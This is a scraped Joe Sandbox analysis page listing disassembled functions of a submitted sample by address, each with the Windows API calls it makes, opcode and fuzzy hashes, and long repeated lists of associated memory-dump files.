Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ErrorLast$CreateFilelstrlen
String ID:
API String ID: 382663435-0
Opcode ID: 4afa60aac2c0453c756b75bfcda708338e62c575b0b13ce7cc06142b95bda13b
Instruction ID: 69d01f7353f4feac3e89b9e5a05ddfb707afd2697202274fd9150dd8c7f2472b
Opcode Fuzzy Hash: 4afa60aac2c0453c756b75bfcda708338e62c575b0b13ce7cc06142b95bda13b
Instruction Fuzzy Hash: A9215E74A04209EFD714DF94DD85B6EB7B5FB08715F20422AE911B73D0DB74AA00CBAA

Function 004163EB Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004163F2

Part of subcall function 00417FA7: __EH_prolog3.LIBCMT ref: 00417FAE

__wcsdup.LIBCMT ref: 00416414
GetCurrentThread.KERNEL32 ref: 00416441
GetCurrentThreadId.KERNEL32 ref: 0041644A

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__wcsdup
String ID:
API String ID: 190065205-0
Opcode ID: 6ed697af994f68f1e51c4633a72e92c9b76028a172524d008dadda08ed8323f9
Instruction ID: 398cf6d74695b0f8bdd3612bb69c3ad236a8aa0be6ec6c4d7054826253a2cefe
Opcode Fuzzy Hash: 6ed697af994f68f1e51c4633a72e92c9b76028a172524d008dadda08ed8323f9
Instruction Fuzzy Hash: 46219EB0900B508FC7219F7A954169AFBF8BFA4704F10891FD5AAC7722DBB8A441CF59

Function 00417222 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,000000F0), ref: 00417248
LoadResource.KERNEL32(?,00000000), ref: 00417254
LockResource.KERNEL32(00000000), ref: 00417262
FreeResource.KERNEL32(00000000), ref: 00417290

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 1d838dc054a6b532e6763024be92630b059cbf44c8d0d3ec88f9188bb2a93689
Instruction ID: e17f140e2adea267eee698a1b9e07c64fbf70e0def8a4f980f90cd420d6bd877
Opcode Fuzzy Hash: 1d838dc054a6b532e6763024be92630b059cbf44c8d0d3ec88f9188bb2a93689
Instruction Fuzzy Hash: 1E116A35600315EFDB108F96C888A9E7BB9EF08351F0480AAF90697350EB75DE41CF25

Function 0041532E Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00415369
RegCloseKey.ADVAPI32(00000000), ref: 00415372
swprintf.LIBCMT ref: 0041538F
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004153A0

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: 3459ce584a62d588912a9596e10148c1a7a4230f5da79c03d8c99fde23f7167e
Instruction ID: 1dec7f7e2a648eaffc5ebffb2756f387759856b1e47cb273b9acf5d0c23bb8dc
Opcode Fuzzy Hash: 3459ce584a62d588912a9596e10148c1a7a4230f5da79c03d8c99fde23f7167e
Instruction Fuzzy Hash: 0301A172A01618BBCB10AF659C45FEF77ECAB88744F10042AFA01E7140EAB8ED059769

Function 00412576 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 004125A2
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 004125CD
GetCapture.USER32 ref: 004125DF
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 004125EE

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 6d6d8f93cd9d0a8a470e3046950822435af3d5fcbdc61d08e8f23ab2978395b4
Instruction ID: 7efc2ce694e88539e959f8bd44c75ac643f19d0518f22634c2c24ebd2325e882
Opcode Fuzzy Hash: 6d6d8f93cd9d0a8a470e3046950822435af3d5fcbdc61d08e8f23ab2978395b4
Instruction Fuzzy Hash: 1D017C317502547BDB312B628CCDFEB3E7AEBCAB10F15007AB605EE1E7D9A58850D624

Function 0041C03C Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0040855C: _malloc.LIBCMT ref: 0040857A

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0041C070
GetCurrentProcess.KERNEL32(?,00000000), ref: 0041C076
DuplicateHandle.KERNEL32(00000000), ref: 0041C079
GetLastError.KERNEL32(?), ref: 0041C094

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: afc5e29bf50d98c1b0d53e75c02aa38defccd87d527eca88c84c491b2afd3de7
Instruction ID: 55f7995248defd9d247bff74f8f550e125eb8481eca9088927c46193b60b2ca8
Opcode Fuzzy Hash: afc5e29bf50d98c1b0d53e75c02aa38defccd87d527eca88c84c491b2afd3de7
Instruction Fuzzy Hash: C201D835700204FBDB10ABA6CD89F9B7F98DB88350F144426F908CB281EB75DC40DB64

Function 0045E560 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0040D018: _memset.LIBCMT ref: 0040D034

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0045E5AD

Part of subcall function 00444AC0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00444AEB
Part of subcall function 00444AC0: _Smanip.LIBCPMTD ref: 00444B3E

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0045E5E3
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0045E5F5
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0045E607

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
